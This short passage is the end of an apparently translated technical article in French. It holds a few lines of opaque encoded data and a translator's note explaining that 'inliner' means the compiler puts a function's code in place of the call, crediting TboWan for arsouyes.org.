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rXvKZuCAwRyZtT1FyLDXIQanDRFN4mmZ0DW25QuWGHpW304TAY+3bR2/vGwI
QyNAjmeoc8kaTulyQfZ0lWwcggCCq2krWlRCM04L+zqNhl7Yfl7lH2Brw422
gwwYvmGrhpi5WuHSBM6kRuJZODoTdVFZRfxMBNYEtQNhB6aq56BOkGLQJkqp
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====
--[ 9.0 - Notes Du Traducteur
[NDT1] NDT : inliner signifie que l'appel à la fonction n'est pas
traduit par un "call" par le compilateur, mais remplacé
par le code de la fonction elle-même.
[traduit de l'anglais par TboWan pour arsouyes.org]
|=[ EOF ]=---------------------------------------------------------------=|